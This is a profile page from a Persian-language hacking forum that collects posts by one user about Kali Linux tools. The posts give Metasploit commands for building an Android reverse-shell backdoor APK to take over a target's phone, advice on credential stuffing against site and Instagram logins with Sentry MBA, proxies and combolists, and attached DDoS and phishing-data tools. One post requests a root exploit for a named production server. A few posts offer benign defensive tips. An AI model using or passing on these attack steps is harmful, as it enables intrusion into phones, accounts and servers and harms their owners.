6pish

کاربر انجمن
  • تعداد ارسال ها

    64
  • تاریخ عضویت

  • آخرین بازدید

  • روز های برد

    15

آخرین بار برد 6pish در 25 آبان 1397

6pish یکی از رکورد داران بیشترین تعداد پسند مطالب است !

درباره 6pish

  • درجه
    1
  • تاریخ تولد 15 فروردین 1374

اطلاعات فردی

  • محل سکونت
    MaKoRaN
  • جنسیت
    آقا

آخرین بازدید کنندگان نمایه

1,129 بازدید کننده نمایه
  1. با عرض سلام خدمت عزیزان دوستان یه لوکال روت لازم داشتم از این کرنل: Linux server1.myadeska.de 3.10.0-514.10.2.el7.x86_64 #1 SMP Fri Mar 3 00:04:05 UTC 2017 x86_64 فوری:)
  2. 6pish

    معرفی ابزار های کاربردی کالی لینوکس

    معرفی ابزار تحت وب Recon-ng recon-ng: ابزاری کاربردی جهت جمع آوری اطلاعات از دامین و سایر دامین های متصل به هم که از تکنیک های اولیه برای نفوذ به یک وبسایت یا سرور میباشد این ابزار با داشتن ماژول زیادی جهت جمع آوری اطلاعات از تارگیت مورد نظر در اختیار شما قرار میدهد. 1- تایپ عبارت recon-ng در ترمینال ابزار در محیط کامندی برای شما به نمایش در خواهد امد. 2- با دستور show modules کلیه ماژول ها برای شما لیست خواهد شد. 3- با انتخاب ماژول مورد نظر از دستور use استفاده کنید.مثال:(use recon/hosts-hosts/resolve) 4- ست کردن تارگیت مورد نظر با دستور set . مثال:( set google.com) 5- با دستور run اقدام به اغاز حمله خود کنید. *** بعد از انجام مراحل بالا نتیجه کار برای شما نشان داده خواهد شد. ==> موفق باشید.
  3. با سلام بعضی از دوستان هستند که مخازن کالی رو اپدیت نکردن، که بدون اپدیت مخازن امکان نصب پکیج ها با دستورات apt-get میسر نیست به همین خاطر این توضیحات را ارائه کردم. موفق باشید.
  4. 6pish

    کمک...

    با سلام خدمت عزیزان مشکل شما نداشتن مخازن کالی هست ابتدا به مسیر زیر برید و فایل sources.list رو باز کنید و کد های زیر رو درون فایل کپی و ذخیره کنید اوکی میشه. deb http://kali.cs.nctu.edu.tw/ /wheezy main contrib non-free deb http://kali.cs.nctu.edu.tw/kali kali-dev main contrib non-free deb http://kali.cs.nctu.edu.tw/kali kali-dev main/debian-installer deb-src http://kali.cs.nctu.edu.tw/kali kali-dev main contrib non-free deb http://kali.cs.nctu.edu.tw/kali kali main contrib non-free deb http://kali.cs.nctu.edu.tw/kali kali main/debian-installer deb-src http://kali.cs.nctu.edu.tw/kali kali main contrib non-free deb http://kali.cs.nctu.edu.tw/kali-security kali/updates main contrib non-free deb-src http://kali.cs.nctu.edu.tw/kali-security kali/updates main contrib non-free deb http://kali.cs.nctu.edu.tw/kali kali-bleeding-edge main
  5. 6pish

    Kali linux 1.1.0

    با عرض سلام دلیل به وجود اومدن این مشکل هنگام نصب کالی بوده باید از اول مراحل نصب را پیش برین تا برسین به قسمت install the system بعد از نصب باید در قسمت boot maneger پاسخ منفی بدین و پارتیشنی که از قبل کالی برای شما ایجاد کرده به نام boot با دستور زیر در قسمت boot maneger وارد کنید /dev/sda بعد عددجلوی مربع میتونه 6 باشه یا 8 مشکل تون حل میشه موفق باشید
  6. 6pish

    مشکل در تست نفوذ اندروید

    با سلام دلیل کار نکردن پیلود شما در بیرون از شبکه داخلی تون به خاطر نداشتن یک ip ثابت یا همون استاتیک هست ... برای رفع این مشکل شما میتونین از سرور مجازی تهیه کنید و از سرور اقدام به تست نفوذ کنید. بعدام پیلود متاسپلویت روی بعضی از گوشی ها جوابگو نیست مخصوصا مدل های sony که به محض دسترسی به گوشی ابزارهای منیتی گوشی دسترسی شما را قط خواهد کرد. آموزش تصویری را میتونید از لینک تاپیک زیر دریافت کنید... http://guardiran.org/forums/topic/4692-معرفی-ابزار-های-کاربردی-کالی-لینوکس/?page=3 موفق باشد.
  7. 6pish

    معرفی ابزار های کاربردی کالی لینوکس

    معرفی ابزار امنیتی Metasploit متاسپلویت ابزاری کاملا متن باز برای متخصصین امنیت شبکه میباشد که با استفاده از متاسپلویت میتوان از آسیب پذیری های سیستم ها را مورد تست نفوذ قرار داد. و این ابزار به صورت دیفالت از اکسپلویت های مختلفی بهره میگیرد ولی شما هم میتوانید اکسپلویت های شخصی خود را در محیط متاسپلویت اظافه کنید. --> با استفاده از متاسپلویت شما قادر خواهید بود ب ساخت backdoor اقدام به پیاده سازی حملات از جمله به گوشی های هوشمند اندروید، ویندوز و دیگر نرم افزار های کاربردی کنید. ==> با دستور زیر اقدام به بالا آوردن محیط کنسولی متاسپلویت کنید: msfconsole هنگامی که نیاز به ماژول خاصی مثل pdf داشتید با دستور زیر اقدام به جستجوی ماژول های لازم کنید: show pdf با ست کردن هر ماژول با هر مرحله آپشن های لازم را با دستور زیر برای شما نمایش داده خواهد شد: show options ---> و در ادامه با ست کردن پیلود گوش دهنده meterpreter اقدام به شنود شبکه، دسترسی به webcam، shell و ... کنید. **** آموزش تصویری حمله به گوشی های هوشمند اندروید + رهگیری نفوذگر پیوست شد. Android-Hacking.part1.rar Android-Hacking.part2.rar
  8. 6pish

    پرسش

    با سلام از این دستورات اقدام به ساخت فایل بک دور کنید: ... تذکر: از این کامندی که شما اسکرین گرفتین ابتدا باید ip اصلی را وارد کنید و در مرحله دوم local ip را وارد کنید. msfconsole use android/meterpreter/reverse_tcp *set LHOST *your ip address set LPORT 4444 generate -t raw -f 6pish.apk (تا این مرحله فایل بک دور به اسم 6pish.apk در مسیر root ساخته شد) ------------------------------------ use exploit/multi/handler set PAYLOAD android/meterpreter/reverse_tcp *set LHSOT *local ip address set LPORT 4444 show options exploit (حالا فایل در پشتی آماده نصب در گوشی هوشمند تارگت هست تا شما بتونید به کلیه گوشی دسترسی بگیرید) موفق باشید...
  9. 6pish

    معرفی ابزار های کاربردی کالی لینوکس

    معرفی ابزار xerosploit ابزاری فوق العاده کاربردی برای کسانی که علاقه مند به حملات MITM هستند که این ابزار امکاناتی نظیر شنود پکت های درون شبکه , ربودن پسورد های درون شبکه و کلی امکانات دیگه. این ابزار به صورت دیفالت روی کالی نصب نیست و شما با دستورات زیر میتونید اقدام به نصب ابزار در محیط ترمینال کنید: apt-get update apt-get upgrade git clone https://github.com/LionSec/xerosploit cd xerosploit && sudo python install.py sudo xerosploit با دستورات بالا ابزار برای شما نصب و در محیط کامندی اجرا خواهد شد. موفق باشید
  10. 6pish

    معرفی ابزار های کاربردی کالی لینوکس

    معرفی ابزار Text Finde فیشینگ از جمله حملاتی است که سعی در بدست اوردن اطلاعات شخصی شما در فضای اینترنت می باشد و شما به بهره گیری از این ابزار اقدام در خواندن اطلاعات صفحات جعلی کنید. سوال: کار این ابزار چیه؟ حالا شاید برای شما سوال باشه که این ابزار چیکار میتونه بکنه , این ابزار به زبان پایتون نوشته شده است و شما بعد از پیدا کردن صفحات جعلی اینترنتی اقدام به استخراج اطلاعات ذخیره شده با پسوند txt در وبسایت کنید و طلاعات ذخیره شده در صفحات جعلی را دانلود کنید. موفق باشید. **** فایل پیوست شد پسورد فایل guardiran.org Text Finde.rar
  11. 6pish

    لاگین کردن به سایت

    با سلام شما میتونید با ابزار sentry mba اقدام به تست پسورد روی هر پیج لاگین چه سایت باشه چه اینستا و... 1. ابتدا باید کانفیگ اون سایت رو بدست بیارید 2. یه لیست پروکسی به نرم افزار بدید تا با هر بار تست پسورد از پروکسی استفاده کنه و ip شما را بلاک نکنه 3. میتونید از کمبولیست اقدام به تست کنید. موفق باشید...
  12. 6pish

    معرفی ابزار های کاربردی کالی لینوکس

    معرفی اکسپلویت DDOS Attack این ابزار به زبان پایتون نوشته شده است که با این ابزار قدرتمند شما قادر خواهید بود حملات dos , ddos سنگین را علیه تارگیت خودتون انجام دهید نکته: چنان چه این ابزار را در سرور های زامبی خود اجرا کنید و به یه تارگیت حمله کنید قادر هست سایت ها و سرور های بزرگ رو down کنه. پسورد فایل: guardiran.org DDOS Attack.rar
  13. 6pish

    امنیت در ویندوز

    بالا بردن امنیت در شبکه های کامپیوتری امروزه خیلی از ماها از کامپیوتر های در یک رنج ip یا همون شبکه سروکار داریم چه در اداره جات چه در مدارس و دانشگاه ها و... حالا امنیت 100 درصد نیست ولی باید امنیت را در حد قابل قبولی افزایش داد که در چند مورد خلاصه میکنم... 1. استفاده از سویچ در کنار روتر در شبکه که امنیت در مقابل شنود بسته های شبکه را چند درصدی افزایش میدهد. 2. پرهیز از استفاد کردن روتر های TPLINK و DLINK ترجیحا از روترهای سیسکو و میکروتیک استفاده شود، زیرا اکسپلویت های زیادی برای دور زدن پسورد این نوع روتر ها وجود داره که با بدست آوردن این پسورد هکر قادر خواهد بود تا به اطلاعات مهم شما دست پیدا کند و حملاتی از جمله مهندسی اجتماعی روی شبکه شما انجام دهد. 3. شاید شما از جمله افرادی باشید که از تلفن ، فکس ، دوربین مداربسته و پرینتر در یک شبکه استفاده میکنید که بنده توصیه نمی کنم زیرا هکر بعد از نفوذ به شبکه داخلی قادر خواهد بود تا تماسها ،فکس ها و اطلاعات پرنت شده و دوربین های مداربسته شما دست پیدا کند. نکته امنیتی: 1. به صورت جداگانه در شبکه قرار بگیرند 2. قرار دادن این چهار دستگاه به پشت proxy 4. اجرا نکردن فایل های مشکوک که از منابع نامعلوم ارسال می شوند چه ابزار باشد چه یک فایل pdf حاوی اطلاعات شرکت یا ... ؛ هکر ها از این قبیل روش ها حملاتی از جمله مهندسی اجتماعی که قبلا از شبکه بدست آورده اند با این گونه فایل ها اقدام به گرفتن دسترسی به شبکه داخلی شما را دارند. موفق و سربلند باشید.
  14. 6pish

    معرفی ابزار های کاربردی کالی لینوکس

    معرفی ابزار scapy ابزاری قدرتمند در زمینه تولید بسته ، اسکن شبکه و شنود بسته ها می باشد با این ابزار شما میتونید در شبکه بسته تولید کنید و پاسخ بسته را دریافت کنید. با این دستور بزار برای شما به نمایش در میاد.. scapy موفق باشید...
  15. 6pish

    امنیت در ویندوز

    با سلامی دوباره خدمت دوستان امروز میخوام برای پیشگیری از قوع حمله هکری علیه ویندوز یکم توضیح بدم امیدوارم مطالب بنده حداقل بتونه چند درصدی علم شما را بالا ببره. ما علاوه بر چک کردن پورت های باز و پروسس های فعال ابتدا برای پیشگیری باید به چند نکته توجه کنیم ... 1. خودداری از کلیک بر روی لینک های مشکوک بخصوص لینک هایی که به هر شکل مهندسی اجتماعی برای شما ارسال میشوند و مخصوصا لینک هایی که دارای ip هستند به شدت خودداری کنید 2.خودداری از نصب نرم افزار مشکوک و کم حجم که هکر ها با این ابزار ها قادر هستند داده های شما را مستقیم روی سرور هکر آپلود کنه که انتی ویروس ها قادر به شناسایی آن نیستند( هنگامی که ابزار مخربی را بعد از نصب متوجه شدین با خواندن سورس کد ابزار ip یا دیگر آدرس هکر با بیرون بکشید) 3. به هیچ عنوان ip ولید خود را در اختیار کسی قرار ندهید (هکر ها در کمین هستند)